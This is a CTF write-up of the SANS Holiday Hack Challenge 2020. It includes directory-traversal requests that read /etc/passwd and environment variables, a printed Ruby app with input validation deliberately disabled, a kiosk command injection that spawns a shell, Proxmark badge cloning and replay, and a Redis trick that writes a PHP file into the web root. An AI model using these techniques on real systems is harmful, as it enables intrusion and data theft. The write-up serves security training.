SANS Holiday Hack Challenge 2020 / KringleCon

Table of Contents

• Useful Links
• Objectives
  • 1) Uncover Santa’s Gift List
  • 2) Investigate S3 buckets
  • 3) Point-of-Sale Password Recovery
  • 4) Operate the Santavator
  • 5) Open HID Lock
  • 6) Splunk Challenge
  • 7) Solve the Sleigh’s CAN-D-BUS Problem
  • 8) Broken Tag Generator
• Terminal Challenges
  • Kringle Kiosk
  • Unescape Tmux
  • Linux Primer
  • Speaker UNPrep – Bushy Evergreen
  • Sort-O-Matic – Minty Candycane
  • CAN-Bus Investigation – Wunorse Openslae
  • 33.6kbps – Fitzy Shortstack
  • Redis Bug Hunt – Holly Evergreen
• Minigames
• Conclusion

Useful Links

• SANS Holiday Hack Challenge
• CTF Status
• Report bugs

Objectives

1) Uncover Santa’s Gift List

There is a photo of Santa’s Desk on that billboard with his personal gift list. What gift is Santa planning on getting Josh Wright for the holidays? Talk to Jingle Ringford at the bottom of the mountain for advice.

The badge says: Make sure you Lasso the correct twirly area. There are tools out there that could help Filter the Distortion that is this Twirl.

• Unswirl the picture using Photopea.
• Upload the file billboard.png.
• Using the Lasso Select tool on the left, select only the Josh Wright line.
• Copy this in a new layer.
• Click on Filter->Distort->Twirl.
• Change the Angle value until the text is readable.

Using GIMP

• Open file billboard.png.
• Using the Lasso Select tool on the left, select only the Josh Wright line.
• Click Filters->Distorts->Whirl and Pinch.
• Play with the Whirl value (-300) until text is readable.

FLAG: Proxmark. The Proxmark is a RFID tool.

2) Investigate S3 buckets

Can you help me? Santa has been experimenting with new wrapping technology, and we’ve run into a ribbon-curlin nightmare! We store our essential data assets in the cloud, and what a joy it’s been! Except I don’t remember where, and the Wrapper3000 is on the fritz! Can you find the missing package, and unwrap it all the way?

ls -la
cd bucket_finder/
ls -la
cat README 
Bucket Finder
=============

Copyright(c) 2011, Robin Wood <robin@digininja.org>

This project goes alongside my blog post "Whats In Amazon's Buckets?"
http://www.digininja.org/blog/whats_in_amazons_buckets.php , read through that
for more information on what is going on behind the scenes.

[...]

Go read What’s in Amazon’s buckets?

nano wordlist
(add Wrapper3000 like in the greeting message)

./bucket_finder.rb wordlist --download

http://s3.amazonaws.com/kringlecastle
Bucket found but access denied: kringlecastle
http://s3.amazonaws.com/wrapper
Bucket found but access denied: wrapper
http://s3.amazonaws.com/santa
Bucket santa redirects to: santa.s3.amazonaws.com
http://santa.s3.amazonaws.com/
        Bucket found but access denied: santa
http://s3.amazonaws.com/wrapper3000
Bucket Found: wrapper3000 ( http://s3.amazonaws.com/wrapper3000 )
        <Downloaded> http://s3.amazonaws.com/wrapper3000/package

Unwrap the package

cd wrapper3000
cat package 
UEsDBAoAAAAAAIAwhFEbRT8anwEAAJ8BAAAcABwAcGFja2FnZS50eHQuWi54ei54eGQudGFyLmJ6MlVUCQADoBfKX6AXyl91eAsAAQT2AQAABBQAAABCWmg5MUFZJlNZ2ktivwABHv+Q3hASgGSn//AvBxDwf/xe0gQAAAgwAVmkYRTKe1PVM9U0ekMg2poAAAGgPUPUGqehhCMSgaBoAD1NNAAAAyEmJpR5QGg0bSPU/VA0eo9IaHqBkxw2YZK2NUASOegDIzwMXMHBCFACgIEvQ2Jrg8V50tDjh61Pt3Q8CmgpFFunc1Ipui+SqsYB04M/gWKKc0Vs2DXkzeJmiktINqjo3JjKAA4dLgLtPN15oADLe80tnfLGXhIWaJMiEeSX992uxodRJ6EAzIFzqSbWtnNqCTEDML9AK7HHSzyyBYKwCFBVJh17T636a6YgyjX0eE0IsCbjcBkRPgkKz6q0okb1sWicMaky2Mgsqw2nUm5ayPHUeIktnBIvkiUWxYEiRs5nFOM8MTk8SitV7lcxOKst2QedSxZ851ceDQexsLsJ3C89Z/gQ6Xn6KBKqFsKyTkaqO+1FgmImtHKoJkMctd2B9JkcwvMr+hWIEcIQjAZGhSKYNPxHJFqJ3t32Vjgn/OGdQJiIHv4u5IpwoSG0lsV+UEsBAh4DCgAAAAAAgDCEURtFPxqfAQAAnwEAABwAGAAAAAAAAAAAAKSBAAAAAHBhY2thZ2UudHh0LloueHoueHhkLnRhci5iejJVVAUAA6AXyl91eAsAAQT2AQAABBQAAABQSwUGAAAAAAEAAQBiAAAA9QEAAAAA

This looks like base64. Decode it.

cat package | base64 -d

PK
??�
�
   package.txt.Z.xz.xxd.tar.bz2
...

From the list of file signatures, PK looks like a ZIP file. Unzip it. The file command can also be used.

cat package | base64 -d > package.zip
unzip package.zip -d ./

Archive:  package.zip
 extracting: ./package.txt.Z.xz.xxd.tar.bz2

Uncompress the new file using bzip2.

tar xjf package.txt.Z.xz.xxd.tar.bz2

We obtain an xxd file. This is a hexadump.

xxd -r package.txt.Z.xz.xxd > package.txt.Z.xz

�7zXZ�ִF  !
  ...

We obtain a XZ file. Decompress it.

unxz package.txt.Z.xz

We obtain a Z file.

uncompress package.txt.Z

cat package.txt
North Pole: The Frostiest Place on Earth

FLAG: North Pole: The Frostiest Place on Earth

3) Point-of-Sale Password Recovery

Help Sugarplum Mary in the Courtyard find the supervisor password for the point-of-sale terminal. What’s the password?

Asar Electron Archive: Asar is a simple extensive archive format, it works like tar that concatenates all files together without compression, while having random access support.

Install asar on Kali Linux

apt install npm
npm install -g asar

Extract santa-shop.exe

• On Mac OS, open santa-shop.exe using the Unachiver application.

Extract the Electron application source code

• Find app-64, extract it using the Unarchiver again.
• Under resources, copy app.asar to Kali Linux machine.

# Go into the app’s directory
cd ~/ctf/SANS

# Create a directory to paste the content of app
mkdir santa-shop

# Unpack the asar file
asar extract app.asar santa-shop

cd santa-shop
grep -Ri "pass" ./

In main.js, there is

const SANTA_PASS = 'santapass'

FLAG: santapass

4) Operate the Santavator

Speak to Sparkle Redberry (left of the elevator) to get the Elevator Service Key.

Get the items

• Broken Candy Cane: Outside, in front of the castle, just behind Santa.
• Hex Nut: In the Entry, on the right, in front of the elevator.
• Green Light: In the courtyard, at the upper left corner of the screen.

Operate the elevator – The “Smart” way

• Give power to the first button (Lobby) using the green light.
• Display the browser’s inspector. Look for btn1 or data-floor. You can change it to 1.5, 2, 3 or r.

<button class="btn btn1 active powered" data-floor="r">1</button>

Operate the elevator – The “conventional” way

Click on the Elevator Service Key on the bottom right of the elevator floor selection panel.

HINT: It’s really more art than science. The goal is to put the right colored light into the receivers on the left and top of the panel.

• Click on the Elevator Service Key to get back at the floor selection panel.
• Select the Talks floor.

Get the other items

• Red Bulb: On the Talks floor, on the right of Track 7 room.
• Elevator 1.5 Button: In the UnPrepardness Room, near the door.

Get the other items…

• Large Marble: On the floor 1.5, on the right of the first table.
• Proxmark3: On the floor 1.5, go in the Wrapping Room at the back.
• Rubber ball: In Wrapping Room.
• Yellow Bulb: Floor R

5) Open HID Lock

Open the HID lock in the Workshop. Talk to Bushy Evergreen near the talk tracks for hints on this challenge. You may also visit Fitzy Shortstack in the kitchen for tips.

HINT: The Proxmark is a multi-function RFID device, capable of capturing and replaying RFID events. You can use a Proxmark to capture the facility code and ID value of HID ProxCard badge by running lf hid read when you are close enough to someone with a badge.

Watch Talk: Larry Pesce, HID Card Hacking | KringleCon 2020

Get the Proxmark3 (item): On the floor 1.5, go in the Wrapping Room at the back.

Go near an elf. To clone its badge, click on your badge, Items -> Proxmark3 -> Open Proxmark CLI.

You can type help for all commands (or command help like lf hid help).

# Find nearby HID (like proximity cards)
lf search
[+] Valid HID Prox ID found!

# Read HID cards
lf hid read

# Noel Boetie - Wrapping room, floor 1.5
#db# TAG ID: 2006e22ee1 (6000) - Format Len: 26 bit - FC: 113 - Card: 6000

# Bow Ninecandle - floor 2
#db# TAG ID: 2006e22f0e (6023) - Format Len: 26 bit - FC: 113 - Card: 6023

# Ginger Breddy or Sparkle Redberry - Lobby, near elevator
#db# TAG ID: 2006e22f0d (6022) - Format Len: 26 bit - FC: 113 - Card: 6022

# Angel Candysalt - Lobby, door right to the elevator
#db# TAG ID: 2006e22f31 (6040) - Format Len: 26 bit - FC: 113 - Card: 6040

# Shinny Upatree - Outside, in front of the castle
#db# TAG ID: 2006e22f13 (6025) - Format Len: 26 bit - FC: 113 - Card: 6025

# No results:
# Minty Candycane - Workshop, floor 1.5
# Chimney Scissorsticks, Jack Frost, Morcel Nougat, Tangle Coalbox - floor 2

Replay cards

Go to the Workshop on floor 1.5, beside the locked door. Click on your badge, Items -> Proxmark3 -> Open Proxmark CLI.

Stand in front of the terminal not in front of the door (to validate)

lf hid sim -r 2006e22ee1
lf hid sim -r 2006e22f0e
lf hid sim -r 2006e22f0d
lf hid sim -r 2006e22f31
lf hid sim -r 2006e22f13

The right one is

lf hid sim -r 2006e22f0e

Go into the unlocked room and walk into the light. YOU BECOME SANTA CLAUS!!!

6) Splunk Challenge

Access the Splunk terminal in the Great Room. What is the name of the adversary group that Santa feared would attack KringleCon?

HINT: Dave Herrald talks about emulating advanced adversaries and hunting them with Splunk. There was a great Splunk talk at KringleCon 2 that’s still available! Defenders often need to manipulate data to decRypt, deCode, and reform it into something that is useful. Cyber Chef is extremely useful here!

For this challenge, we need Atomic Red Team’s documentation.

1. How many distinct MITRE ATT&CK techniques did Alice emulate?

 | tstats count where index=T* by index 

Count distinct techniques like T1234. For example, in t1059.003-main, t1059 is the technique, whereas t1059.003 is a sub-technique.

ANSWER: 13

2. What are the names of the two indexes that contain the results of emulating Enterprise ATT&CK technique 1059.003? (Put them in alphabetical order and separate them with a space)

| tstats count where index=T1059.003* by index

ANSWER: t1059.003-main t1059.003-win

3. One technique that Santa had us simulate deals with ‘system information discovery’. What is the full name of the registry key that is queried to determine the MachineGuid?

Using Atomic Red Team, look for Discovery -> System Information Discovery.

index=T1082* machineguid

In the events, we can see

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

ANSWER: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography

4. According to events recorded by the Splunk Attack Range, when was the first OSTAP related atomic test executed? (Please provide the alphanumeric UTC timestamp.)

index=attack OSTAP

ANSWER: 2020-11-30T17:44:15Z

5. One Atomic Red Team test executed by the Attack Range makes use of an open source package authored by frgnca on GitHub. According to Sysmon (Event Code 1) events in Splunk, what was the ProcessId associated with the first use of this component?

Look for frgnca on Github and explore the tools. See which tools are used by Atomic Red Team (use your awesome Google skills with “atomic red team <name of a tool from frgnca>”). We find that T1123 uses AudioDeviceCmdlet.

index=* Channel="Microsoft-Windows-Sysmon/Operational" EventCode=1 WindowsAudioDevice-Powershell-Cmdlet

Click on the first event and look for ParentProcessID.

ANSWER: 3648

6. Alice ran a simulation of an attacker abusing Windows registry run keys. This technique leveraged a multi-line batch file that was also used by a few other techniques. What is the final command of this multi-line batch file used as part of this simulation?

Search for .bat files and search in Atomic Red Team. The answer is technique T1074.001 in Discovery.bat.

index=t* atomics\\T*\\src\\*.bat

ANSWER: quser

7. According to x509 certificate events captured by Zeek (formerly Bro), what is the serial number of the TLS certificate assigned to the Windows domain controller in the attack range?

index=* sourcetype=bro* certificate

The second event in the results has:

 certificate.exponent: 65537
 certificate.issuer: CN=win-dc-748.attackrange.local
 certificate.key_alg: rsaEncryption
 certificate.key_length: 2048
 certificate.key_type: rsa
 certificate.not_valid_after: 2021-05-29T01:08:57.000000Z
 certificate.not_valid_before: 2020-11-27T01:08:57.000000Z
 certificate.serial: 55FCEEBB21270D9249E86F4B9DC7AA60
 certificate.sig_alg: sha256WithRSAEncryption
 certificate.subject: CN=win-dc-748.attackrange.local
 certificate.version: 3
 id: Fen0DH2KtOxQwt4BFk
 ts: 2020-11-30T21:03:50.409634Z 

“dc” usually stands for domain controller…

ANSWER: 55FCEEBB21270D9249E86F4B9DC7AA60

Challenge Question

What is the name of the adversary group that Santa feared would attack KringleCon?

Alice says:

This last one is encrypted using your favorite phrase!
The base64 encoded ciphertext is:
7FXjP1lyfKbyDK/MChyf36h7

It's encrypted with an old algorithm that uses a key.
We don't care about RFC 7465 up here!
I leave it to the elves to determine which one! 

Use CyberChef to decode then decrypt the ciphertext. RFC 7465 is RC4…

Dave Herrald, Adversary Emulation and Automation | KringleCon 2020‘s talk last slide is SUPER IMPORTANT… Stay Frosty.

In CyberChef, in Recipe:

• Add Base64, standard alphabet.
• Add RC4, with passphrase Stay Frosty

ANSWER: The Lollipop Guild

7) Solve the Sleigh’s CAN-D-BUS Problem

Jack Frost is somehow inserting malicious messages onto the sleigh’s CAN-D bus. We need you to exclude the malicious messages and no others to fix the sleigh. Visit the NetWars room on the roof and talk to Wunorse Openslae for hints.

HINT: Try filtering out one CAN-ID at a time and create a table of what each might pertain to. What’s up with the brakes and doors?

Add filters to isolate message types and figure out which ones are the brakes and doors (from hint).

ID: 188 Contains <leave empty>
ID: 244 Contains <leave empty>
ID: 080 Contains <leave empty>
ID: 19B Contains <leave empty>
ID: 019 Contains <leave empty>

Doors: 19B, already found in Terminal challenge (CAN-Bus Investigation – Wunorse Openslae).

LOCK:   19B#000000000000
UNLOCK: 19B#00000F000000

This entry is generated but is wrong: 19B#0000000F2057

Brakes: 080, activate the brakes (set at max).

# Brakes: 100 is 000064
# Brake at 0:
080#000000
# Brake at 100:
080#000064

This entry is generated but is wrong: 080#FFFFF*

Filter out these entries:

# Door:
ID: 19B equals 00 00 00 0F 20 57

# Brakes: 100 is 000064
ID: 080 contains empty empty FF FF empty

Sleigh is now working!

8) Broken Tag Generator

Help Noel Boetie fix the Tag Generator in the Wrapping Room. What value is in the environment variable GREETZ? Talk to Holly Evergreen in the kitchen for help with this.

Fuzz in the url (adding /index), a verbose error tells us it’s using ruby (.rb) and the path to the source code.

Something went wrong!
Error in /app/lib/app.rb: Route not found

When trying to upload something other than an image, we get the path for uploaded files:

Error in /app/lib/app.rb:
Unsupported file type: /tmp/RackMultipart20210106-1-1kpbnz6.pdf

Intercept requests using Burp Suite. When uploading an image, we can access it using:

https://tag-generator.kringlecastle.com/image?id=generated-image-id.png

We can also manipulate the path – Directory Traversal:

https://tag-generator.kringlecastle.com/image?id=../tmp/generated-image-id.png

When trying to access other file types, it seems to always display an error:

The image cannot be displayed because it contains errors.

However, observing requests within Burp, we can see the file’s content…

Getting the web application user name

GET /image?id=../etc/passwd HTTP/1.1
Host: tag-generator.kringlecastle.com
User-Agent: toto
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
[...]

root:x:0:0:root:/root:/bin/bash
[...]
app:x:1000:1000:,,,:/home/app:/bin/bash

The OS user for the web application is app as it is possible to read the .profile file in its home directory (nothing of interest in it) and is the only one (with root) that can log in.

GET /image?id=../home/app/.profile HTTP/1.1

Get the environment variables

GET /image?id=../proc/self/environ HTTP/1.1

PATH=/usr/local/bundle/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/binHOSTNAME=cbf2810b7573RUBY_MAJOR=2.7RUBY_VERSION=2.7.0RUBY_DOWNLOAD_SHA256=27d350a52a02b53034ca0794efe518667d558f152656c2baaf08f3d0c8b02343GEM_HOME=/usr/local/bundleBUNDLE_SILENCE_ROOT_WARNING=1BUNDLE_APP_CONFIG=/usr/local/bundleAPP_HOME=/appPORT=4141HOST=0.0.0.0GREETZ=JackFrostWasHereHOME=/home/app

FLAG: JackFrostWasHere

Getting the application source code using Burp

Just for fun, since we already have the flag…

GET /image?id=../app/lib/app.rb HTTP/1.1
Host: tag-generator.kringlecastle.com
User-Agent: toto
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-CA,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.1 200 OK
Server: nginx/1.14.2
Date: Fri, 08 Jan 2021 01:46:08 GMT
Content-Type: image/jpeg
Content-Length: 4886
Connection: close
X-Content-Type-Options: nosniff
Strict-Transport-Security: max-age=15552000; includeSubDomains
X-XSS-Protection: 1; mode=block
X-Robots-Tag: none
X-Download-Options: noopen
X-Permitted-Cross-Domain-Policies: none

# encoding: ASCII-8BIT

TMP_FOLDER = '/tmp'
FINAL_FOLDER = '/tmp'

# Don't put the uploads in the application folder
Dir.chdir TMP_FOLDER

require 'rubygems'

require 'json'
require 'sinatra'
require 'sinatra/base'
require 'singlogger'
require 'securerandom'

require 'zip'
require 'sinatra/cookies'
require 'cgi'

require 'digest/sha1'

LOGGER = ::SingLogger.instance()

MAX_SIZE = 1024**2*5 # 5mb

# Manually escaping is annoying, but Sinatra is lightweight and doesn't have
# stuff like this built in :(
def h(html)
  CGI.escapeHTML html
end

def handle_zip(filename)
  LOGGER.debug("Processing #{ filename } as a zip")
  out_files = []

  Zip::File.open(filename) do |zip_file|
    # Handle entries one by one
    zip_file.each do |entry|
      LOGGER.debug("Extracting #{entry.name}")

      if entry.size > MAX_SIZE
        raise 'File too large when extracted'
      end

      if entry.name().end_with?('zip')
        raise 'Nested zip files are not supported!'
      end

      # I wonder what this will do? --Jack
      # if entry.name !~ /^[a-zA-Z0-9._-]+$/
      #   raise 'Invalid filename! Filenames may contain letters, numbers, period, underscore, and hyphen'
      # end

      # We want to extract into TMP_FOLDER
      out_file = "#{ TMP_FOLDER }/#{ entry.name }"

      # Extract to file or directory based on name in the archive
      entry.extract(out_file) {
        # If the file exists, simply overwrite
        true
      }

      # Process it
      out_files << process_file(out_file)
    end
  end

  return out_files
end

def handle_image(filename)
  out_filename = "#{ SecureRandom.uuid }#{File.extname(filename).downcase}"
  out_path = "#{ FINAL_FOLDER }/#{ out_filename }"

  # Resize and compress in the background
  Thread.new do
    if !system("convert -resize 800x600\\> -quality 75 '#{ filename }' '#{ out_path }'")
      LOGGER.error("Something went wrong with file conversion: #{ filename }")
    else
      LOGGER.debug("File successfully converted: #{ filename }")
    end
  end

  # Return just the filename - we can figure that out later
  return out_filename
end

def process_file(filename)
  out_files = []

  if filename.downcase.end_with?('zip')
    # Append the list returned by handle_zip
    out_files += handle_zip(filename)
  elsif filename.downcase.end_with?('jpg') || filename.downcase.end_with?('jpeg') || filename.downcase.end_with?('png')
    # Append the name returned by handle_image
    out_files << handle_image(filename)
  else
    raise "Unsupported file type: #{ filename }"
  end

  return out_files
end

def process_files(files)
  return files.map { |f| process_file(f) }.flatten()
end

module TagGenerator
  class Server < Sinatra::Base
    helpers Sinatra::Cookies

    def initialize(*args)
      super(*args)
    end

    configure do
      if(defined?(PARAMS))
        set :port, PARAMS[:port]
        set :bind, PARAMS[:host]
      end

      set :raise_errors, false
      set :show_exceptions, false
    end

    error do
      return 501, erb(:error, :locals => { message: "Error in #{ __FILE__ }: #{ h(env['sinatra.error'].message) }" })
    end

    not_found do
      return 404, erb(:error, :locals => { message: "Error in #{ __FILE__ }: Route not found" })
    end

    get '/' do
      erb(:index)
    end

    post '/upload' do
      images = []
      images += process_files(params['my_file'].map { |p| p['tempfile'].path })
      images.sort!()
      images.uniq!()

      content_type :json
      images.to_json
    end

    get '/clear' do
      cookies.delete(:images)

      redirect '/'
    end

    get '/image' do
      if !params['id']
        raise 'ID is missing!'
      end

      # Validation is boring! --Jack
      # if params['id'] !~ /^[a-zA-Z0-9._-]+$/
      #   return 400, 'Invalid id! id may contain letters, numbers, period, underscore, and hyphen'
      # end

      content_type 'image/jpeg'

      filename = "#{ FINAL_FOLDER }/#{ params['id'] }"

      if File.exists?(filename)
        return File.read(filename)
      else
        return 404, "Image not found!"
      end
    end

    get '/share' do
      if !params['id']
        raise 'ID is missing!'
      end

      filename = "#{ FINAL_FOLDER }/#{ params['id'] }.png"

      if File.exists?(filename)
        erb(:share, :locals => { id: params['id'] })
      else
        return 404, "Image not found!"
      end
    end

    post '/save' do
      payload = params
      payload = JSON.parse(request.body.read)

      data_url = payload['dataURL']
      png = Base64.decode64(data_url['data:image/png;base64,'.length .. -1])

      out_hash = Digest::SHA1.hexdigest png
      out_filename = "#{ out_hash }.png"
      out_path = "#{ FINAL_FOLDER }/#{ out_filename }"
      
      LOGGER.debug("output: #{out_path}")
      File.open(out_path, 'wb') { |f| f.write(png) }
      { id: out_hash }.to_json
    end
  end
end

Terminal Challenges

Kringle Kiosk

~~~~~~~~~~~~~~~~~~~~~~~~~~~~
 Welcome to the North Pole!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1. Map
2. Code of Conduct and Terms of Use
3. Directory
4. Print Name Badge
5. Exit

Choose 4 to print a name badge. Injection:

a;/bin/bash

You have now a bash shell!

   ___                                                      _    
  / __|   _  _     __      __      ___     ___     ___     | |   
  \__ \  | +| |   / _|    / _|    / -_)   (_-<    (_-<     |_|   
  |___/   \_,_|   \__|_   \__|_   \___|   /__/_   /__/_   _(_)_  
_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_|"""""|_| """ | 
"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-'"`-0-0-' 

HINT: Santa’s Wrapper3000 is pretty buggy. It uses several compression tools, binary to ASCII conversion, and other tools to wrap packages.

Unescape Tmux

Can you help me?

I was playing with my birdie (she's a Green Cheek!) in something called tmux,
then I did something and it disappeared!

Can you help me find her? We were so attached!!

tmux attach

You found her! Thank you!!!

HINT: It’s really more art than science. The goal is to put the right colored light into the receivers on the left and top of the panel.

Linux Primer

The North Pole 🍭 Lollipop Maker:
All the lollipops on this system have been stolen by munchkins. Capture munchkins by following instructions here and 🍭's will appear in the green bar below. Run the command "hintme" to receive a hint.

ls -la
cat munchkin_19315479765589239

munchkin_24187022596776786

cd workshop
ls -la | grep -v toolbox
file lollipop_engine 
lollipop_engine: ELF 64-bit LSB shared object, x86-64, version 1 (SYSV), dynamically linked, interpreter /lib64/ld-linux-x86-64.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=3507aa01d32c34dc8e8c6462b764adb90a82768d, stripped

chmod u+x ./lollipop_engine
./lollipop_engine

munchkin.898906189498077

rm ~/munchkin_19315479765589239
pwd
cd
rm .munchkin_5074624024543078
history
export
cd workshop
grep -Ri mun ./
./lollipop_engine
blown_fuse0
cd electrical
mv blown_fuse0 fuse0
ln -s fuse0 fuse1
cp fuse1 fuse2
echo "MUNCHKIN_REPELLENT" >> fuse2
find /opt/munchkin_den -iname '*munchkin*'
find /opt/munchkin_den -user munchkin
find /opt/munchkin_den -size +108k -size -110k
ps -ef | grep munchkin
netstat -antp
curl http://127.0.0.1:54321
ps -ef 
kill 39462

HINT: There are tools and guides explaining how to extract ASAR from Electron apps. It’s possible to extract the source code from an Electron app.

Speaker UNPrep – Bushy Evergreen

Help us get into the Speaker Unpreparedness Room! The door is controlled by ./door, but it needs a password! If you can figure out the password, it’ll open the door right up! Oh, and if you have extra time, maybe you can turn on the lights with ./lights activate the vending machines with ./vending-machines? Those are a little trickier, they have configuration files, but it’d help us a lot! (You can do one now and come back to do the others later if you want) We copied edit-able versions of everything into the ./lab/ folder, in case you want to try EDITING or REMOVING the configuration files to see how the binaries react. Note: These don’t require low-level reverse engineering, so you can put away IDA and Ghidra (unless you WANT to use them!)

First part – door

strings door | grep -i PASS

/home/elf/doorYou look at the screen. It wants a password. You roll your eyes - the 
password is probably stored right in the binary. There's gotta be a
Be sure to finish the challenge in prod: And don't forget, the password is "Op3nTheD00r"
Beep boop invalid password

./door
What do you enter? > Op3nTheD00r
Checking......

Door opened!

HINT: The Proxmark is a multi-function RFID device, capable of capturing and replaying RFID events. You can use a Proxmark to capture the facility code and ID value of HID ProxCard badge by running lf hid read when you are close enough to someone with a badge.

Sort-O-Matic – Minty Candycane

1. Matches at least one digit

\d

2. Matches 3 alpha a-z characters ignoring case

[a-zA-Z]{3,}

3. Matches 2 chars of lowercase a-z or numbers

[a-z0-9]{2,}

4. Matches any 2 chars not uppercase A-L or 1-5

[^A-L1-5]{2,}

5. Matches three or more digits only

^\d\d\d+$

6. Matches multiple hour:minute:second time formats only

^(([2]{1}[0-3]{1})|([0-1]?[0-9]{1}))[:]([0-5][0-9])[:][0-5][0-9]$

7. Matches MAC address format only while ignoring case

^([a-fA-F0-9]{2})[:]([a-fA-F0-9]{2})[:]([a-fA-F0-9]{2})[:]([a-fA-F0-9]{2})[:]([a-fA-F0-9]{2})[:]([a-fA-F0-9]{2})$

8. Matches multiple day, month, and year date formats only

^(([0-2]{1}[0-9]{1})|([3][0-1]))[/\.\-](([0][0-9])|([1][0-2]))[/\.\-]([0-9]{4})$

HINT (objective 6): Defenders often need to manipulate data to decRypt, deCode, and refourm it into something that is useful. Cyber Chef is extremely useful here! ave Herrald talks about emulating advanced adversaries and hunting them with Splunk. There was a great Splunk talk at KringleCon 2 that’s still available!

CAN-Bus Investigation – Wunorse Openslae

HINT: Chris Elgee is talking about how CAN traffic works right now! You can hide lines you don’t want to see with commands like cat file.txt | grep -v badstuff

Look at the log and try to notice anything strange.

cat candump.log

A lot of log entries begin with 244, filter them out.

cat candump.log | grep -v 244#

[...]
(1608926663.989726) vcan0 188#00000000
(1608926664.491259) vcan0 188#00000000
(1608926664.626448) vcan0 19B#000000000000
(1608926664.996093) vcan0 188#00000000
[...]
(1608926671.055065) vcan0 188#00000000
(1608926671.122520) vcan0 19B#00000F000000
(1608926671.558329) vcan0 188#00000000
(1608926672.063221) vcan0 188#00000000
(1608926672.568871) vcan0 188#00000000
(1608926673.072611) vcan0 188#00000000
(1608926673.579853) vcan0 188#00000000
(1608926674.086447) vcan0 188#00000000
(1608926674.092148) vcan0 19B#000000000000
[...]

3 entries are longer than the rest. 2 entries have the same value (LOCK) and one is different (UNLOCK).

./runtoanswer
122520

ANSWER: 122520

You need to talk to Wunorse while being a player (not Santa, so go back into the painting).

HINT: Try filtering out one CAN-ID at a time and create a table of what each might pertain to. What’s up with the brakes and doors?

33.6kbps – Fitzy Shortstack

You need to put the modem sounds in order. Fitzy was kind enough to provide a recording of what it sounded like (oh memories…).

Dial 756-8347. Click on the sounds, in this order:

"baa DEE brrrr"
"aaah"
"WEWEWEwrwrrwrr"
"beDURRdunditty"
"SCHHHRRHHRTHRTR"

Fitzy tells us that Santa really seams to trust Shinny Upatree…

Redis Bug Hunt – Holly Evergreen

We need your help!! The server stopped working, all that’s left is the maintenance port. To access it, run: curl http://localhost/maintenance.php We’re pretty sure the bug is in the index page. Can you somehow use the maintenance page to view the source code for the index page?

This is kind of what we’re trying to do…

curl http://localhost/maintenance.php

ERROR: 'cmd' argument required (use commas to separate commands); eg:
curl http://localhost/maintenance.php?cmd=help
curl http://localhost/maintenance.php?cmd=mget,example1

Find Redis password

curl http://localhost/maintenance.php?cmd=config,get,*

Running: redis-cli --raw -a '<password censored>' 'config' 'get' '*'

dbfilename
dump.rdb
requirepass
R3disp@ss
masterauth

Redis password is R3disp@ss

redis-cli
AUTH R3disp@ss

Find index.php location

ps -ef

UID        PID  PPID  C STIME TTY          TIME CMD
root         1     0  0 00:59 pts/0    00:00:00 /bin/bash /sbin/entrypoint.sh
root         6     1  0 00:59 pts/0    00:00:01 /usr/bin/redis-server 127.0.0.1:6379
root        29     1  0 00:59 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    33    29  0 00:59 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    34    29  0 00:59 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    35    29  0 00:59 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    36    29  0 00:59 ?        00:00:00 /usr/sbin/apache2 -k start
www-data    37    29  0 00:59 ?        00:00:00 /usr/sbin/apache2 -k start
root        47     1  0 00:59 pts/0    00:00:00 sudo -i -u player
player      48    47  0 00:59 pts/0    00:00:00 -bash
player      95    48  0 01:15 pts/0    00:00:00 ps -ef

Apache is running. Path is probably /var/www/html.

Redis RCE

redis-cli
AUTH R3disp@ss
config set dir /var/www/html
config set dbfilename redis.php
set test "<?php phpinfo(); ?>"
save

curl http://localhost/redis.php

Warning: Binary output can mess up your terminal. Use "--output -" to tell 
Warning: curl to output it to your terminal anyway, or consider "--output 
Warning: <FILE>" to save to a file.

TO BE CONTINUED…

Minigames

Elfcode

https://elfcode.kringlecastle.com/level2_8465456214260765/index.js

Level 1

https://elfcode.kringlecastle.com/level1/index.js

elf.moveLeft(10)
elf.moveUp(10)

Conclusion

Jack Frost seems behind all of this (maybe with the help of Shinny Upatree, from what Fitzy Shortstack told us), as he is the “nicest person” on the nice & naughty list. This is absurd considering how sloppy he is writting code (his input validation was very bad in the Tag Generator source code). He is also very suspicious in the Netwars’ room, when he says he’s just doing his job watching the elves… He is also everywhere and seems very creepy. Just saying…

And above all this, Jean-Claude said “Jack Frost”!